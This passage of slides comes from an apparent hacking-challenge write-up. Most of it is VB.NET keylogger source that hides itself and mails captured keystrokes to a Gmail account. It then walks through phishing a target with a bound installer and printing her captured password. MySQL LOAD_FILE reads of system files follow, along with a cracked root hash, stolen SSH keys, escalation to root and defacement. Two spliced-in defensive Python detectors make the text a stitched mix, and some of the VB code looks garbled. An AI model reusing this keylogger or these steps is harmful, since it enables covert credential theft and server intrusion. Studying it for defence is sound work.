If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]" End If
  • 35. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "1" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad2) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "2" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad3) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "3" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad4) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "4" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad5) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "5" End If
  • 36. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad6) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "6" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad7) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "7" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad8) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "8" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad9) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "9" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad0) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "0" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey) If (mimiNiCapsAmaLa And &H1S) = &H1S Then txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]" End If ‘this ends checking our keys for now ‘next trap active window so that we can record and associate do It in one of your timers preferably with a short time frame.
  • 37. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 Private Function GetActiveWindowTitle() As String Dim kiAppCurrent As String kiAppCurrent = New String(Chr(0), 100) GetWindowText(GetForegroundWindow, kiAppCurrent, 100) kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1) Return kiAppCurrent End Function ‘in timer 2 we add what we trap to the window we trapped it from Dim strin As String = Nothing If strin <> GetActiveWindowTitle() Then txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() & vbNewLine strin = GetActiveWindowTitle() End If ‘ Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("theharvesteruon@gmail.com") MyMailMessage.To.Add("theharvesteruon@gmail.com") MyMailMessage.Subject = "Team 0wnErz " MyMailMessage.Body = txtNishikieKeys.Text Dim SMPT As New SmtpClient("smtp.gmail.com") SMPT.Port = 587 SMPT.EnableSsl = True SMPT.Credentials = New System.Net.NetworkCredential("theharvesteruon@gmail.com", "<YouReallyExpectOurHarvesterPasswordToBeGivenHereSorry>") SMPT.Send(MyMailMessage) txtNishikieKeys.Text = "" ‘before we forget hide the app lol Me.hide Me.opacity = 0 Me.ShowInTaskbar = false
  • 38. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 For those asking why no keyboard hooks and all the initialization well its XP no need for paranoia and noise on a system but here’s something to calm you down if you don’t like the tiresome but innocent method above. Private KeyboardHookProcedure As Win32.HookProc Public Sub InstallHooks() If hKeyboardHook = 0 Then ' install Keyboard hook KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc) hKeyboardHook = Win32.SetWindowsHookEx( _ Win32.WH.WH_KEYBOARD_LL, _ KeyboardHookProcedure, _ Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _ 0) If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed RemoveHooks() Throw New Exception("SetWindowsHookEx failed.") End If End If End Sub Public Sub RemoveHooks() Dim keyboardResult As Boolean = True If hKeyboardHook <> 0 Then keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook) hKeyboardHook = 0 End If If Not keyboardResult Then 'UnhookWindowsHookEx failed Throw New Exception("UnhookWindowsHookEx failed.") End If End Sub
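A defender's view of the exfiltration path used by the keylogger above, which mails its buffer through smtp.gmail.com on port 587. This is an added example, not code from the original slides: it flags workstation processes that open SMTP connections without being an approved mail client and marks timer-like, evenly spaced sends. The record layout, the allowlisted Thunderbird path, the `setup-helper.exe` name and the five-minute spacing are constructed assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SMTP_PORTS = {25, 465, 587}
# Assumption: full image paths of the mail clients approved on these workstations.
APPROVED_IMAGES = {r"c:\program files\mozilla thunderbird\thunderbird.exe"}

# Constructed sample records: time, host, process image, destination, port.
SAMPLE_LOG = r"""2014-03-18T12:20:05,WS-07,C:\Program Files\Mozilla Thunderbird\thunderbird.exe,smtp.gmail.com,587
2014-03-18T12:23:10,WS-07,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
2014-03-18T12:24:02,WS-07,C:\Program Files\Internet Explorer\iexplore.exe,www.example.org,80
2014-03-18T12:28:10,WS-07,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
2014-03-18T12:33:11,WS-07,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
2014-03-18T12:38:10,WS-07,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
"""


def parse(log_text):
    """Yield (timestamp, host, image, dest, port) tuples from the CSV text."""
    for ts, host, image, dest, port in csv.reader(io.StringIO(log_text)):
        yield datetime.fromisoformat(ts), host, image, dest, int(port)


def unapproved_smtp(log_text, max_jitter_s=30.0):
    """Group SMTP connections by (host, image) for images not on the allowlist.

    A group is marked periodic when it has at least three connections whose
    spacing varies by no more than max_jitter_s, the pattern a timer-driven
    sender produces. Matching on the full path means a binary that merely
    borrows an approved file name is still reported.
    """
    groups = defaultdict(list)
    for ts, host, image, dest, port in parse(log_text):
        if port in SMTP_PORTS and image.lower() not in APPROVED_IMAGES:
            groups[(host, image)].append((ts, dest))

    findings = []
    for (host, image), events in sorted(groups.items()):
        times = sorted(ts for ts, _ in events)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        findings.append({
            "host": host,
            "image": image,
            "destinations": sorted({d for _, d in events}),
            "count": len(events),
            "mean_gap_s": round(mean(gaps), 1) if gaps else None,
            "periodic": len(gaps) >= 2 and pstdev(gaps) <= max_jitter_s,
        })
    return findings


if __name__ == "__main__":
    for finding in unapproved_smtp(SAMPLE_LOG):
        print(finding)
```

Blocking outbound SMTP submission at the egress firewall for everything except the mail relay removes this channel outright; the detection covers hosts where that rule cannot be applied.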
  • 39. Also, on the HackBattle group they mentioned that the VPS was by Azanuru, and we checked them out as we did the keylogger. We need as much as we can get as we plan to own Joan. So we visit the Azanuru site and guess what: open test day till the 20th. It was running on OpenStack and had 3 public IP subnets up and running, one on the same network as the VPS running Nasty salon. Interesting. From phpinfo we saw an Ubuntu install, so we did a 13.10 as is the case on the blog's tutorial, and we join the subnet with the VPS and get a floating IP of: 197.232.19.197. The Azanuru guys notice and send us a mail to join the .20 subnet one and kick our floating IP out, but one thing we know is we are using a keypair to login and it has sudo access, amazing ☺. So this (keypair) is what we will be targeting from Joan, not other credentials. So kick us out, but we know. Btw, just a feel of how the droplet started failing:
    2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling
    2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [112/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]
    2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [119/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]
    2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from ['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds
    2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from <class 'cloudinit.sources.DataSourceCloudStack.DataSourceCloudStack'> failed
    Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78 seconds.
    * Starting AppArmor profiles
    Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
  • 40. So we finish our keylogger in 2 versions and use easy binder to bind them to simfatic forms, 2 versions btw, and we upload them to our spa site and send the mail to Joan: http://spa.oo3.co/soft/Simfatic Simfatic-setup-4.exe http://spa.oo3.co/soft/simfatic /simfatic-setup-2.exe Immediately she installed it, logs started coming in to our harvester and we got good things. The version of the software we bound was meant to give an error message, to give leeway in case of a problem to talk to her and send a second keylogger using a different method of logging, in order to make it successful in case the first fails.
  • 41. But the keylogger never failed us, so here we are: confirmed XP was right. So we got this password as she typed her Gmail password: Tuesday, March 18, 2014 [12:23 PM] thunderbird.exe: Mail Server Password Required
  • 42. n@stys4l0nw3b Time to login to the Gmail and see how much we can get. I think the pictures will speak for us here: So phpMyAdmin points to a db on .195. SSH keypair to login to the server
  • 43. Database Credentials
  • 44. Successful Login. In here we found passwords to both emails in the emails database, but we were still checking stuff out before just using our keypair. So we created a database 0wnErz: we made a table redteam with 2 columns, id and data. We filled them with dummy data, then on update we pulled files.
    UPDATE redteam SET Data=LOAD_FILE('/etc/hosts') WHERE id=3;
    UPDATE redteam SET Data=LOAD_FILE('/etc/passwd') WHERE id=4;
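The `LOAD_FILE` reads above only work when the account holds the FILE privilege and `secure_file_priv` does not confine server-side file access. As an added example (not part of the original slides), the sketch below scans a MySQL general query log for server-side file reads and writes and attributes them to the connecting account. The 5.7-style log layout, the account names, the `salon` schema and the allowed directory are constructed assumptions; the two UPDATE statements are the ones shown on the slide.

```python
import posixpath
import re

# Assumption: the directory secure_file_priv is (or should be) set to.
ALLOWED_DIR = "/var/lib/mysql-files"

# Statements that read or write files on the database host.
FILE_OPS = re.compile(
    r"\b(LOAD_FILE\s*\(|INTO\s+OUTFILE|INTO\s+DUMPFILE)\s*'([^']*)'", re.I)
LINE = re.compile(r"^(\S+)\s+(\d+)\s+(Connect|Query)\t(.*)$")

# Constructed sample in the MySQL 5.7-style general query log layout.
SAMPLE_LOG = (
    "2014-03-18T12:40:01.000000Z\t   31 Connect\twebapp@localhost on salon using Socket\n"
    "2014-03-18T12:40:02.000000Z\t   31 Query\tSELECT name FROM appointments WHERE id=7\n"
    "2014-03-18T12:41:00.000000Z\t   32 Connect\tdbadmin@localhost on 0wnErz using Socket\n"
    "2014-03-18T12:41:07.000000Z\t   32 Query\tUPDATE redteam SET Data=LOAD_FILE('/etc/hosts') WHERE id=3\n"
    "2014-03-18T12:41:15.000000Z\t   32 Query\tUPDATE redteam SET Data=LOAD_FILE('/etc/passwd') WHERE id=4\n"
    "2014-03-18T23:00:00.000000Z\t   33 Connect\tbackup@localhost on salon using Socket\n"
    "2014-03-18T23:00:01.000000Z\t   33 Query\tSELECT * FROM appointments INTO OUTFILE '/var/lib/mysql-files/export.csv'\n"
)


def file_access_findings(log_text):
    """Return one finding per server-side file read or write seen in the log."""
    accounts = {}   # connection id -> account taken from its Connect line
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ts, conn, command, arg = m.groups()
        if command == "Connect":
            accounts[conn] = arg.split(" on ", 1)[0]
            continue
        for op, path in FILE_OPS.findall(arg):
            # Normalise so '../' sequences cannot fake a path inside ALLOWED_DIR.
            resolved = posixpath.normpath(path)
            findings.append({
                "time": ts,
                "account": accounts.get(conn, "unknown"),
                "op": re.sub(r"\s+", " ", op.rstrip("( ").upper()),
                "path": path,
                "outside_allowed_dir": not resolved.startswith(ALLOWED_DIR + "/"),
            })
    return findings


if __name__ == "__main__":
    for finding in file_access_findings(SAMPLE_LOG):
        print(finding)
```

On the preventive side, setting `secure_file_priv` to a dedicated directory and granting FILE to no application or web-facing account stops these statements from returning file contents in the first place.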
  • 45. For lulz, while at it we cracked the MySQL root hash. Despite the firewall, this was a weak password policy on their end: root@localhost: 7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin()) r00t. This happened very fast ☺ The race to the finish line began here. So with our downloaded keypair from the mail we logged in to the db server.
  • 47. Then we became super user. Then we read the history file and more secrets: cat .bash_history
  • 48. So there's another keypair, but to the .2 server, i.e. the webserver, remember from phpinfo? SSH is on port 49800. On checking files in the ubuntu home directory: key, and yes, it's just that into the webserver.
  • 49. Again get root. Well, we'd say we are done, but we needed to share our joy, so on to /var/www and, like any movie, give credits to the actors :D
  • 50. We'd like to thank Gichuki Jonia (./chuks) for the challenge, we learnt a lot while doing it, and Azanuru for the infrastructure. Made all this possible ☺.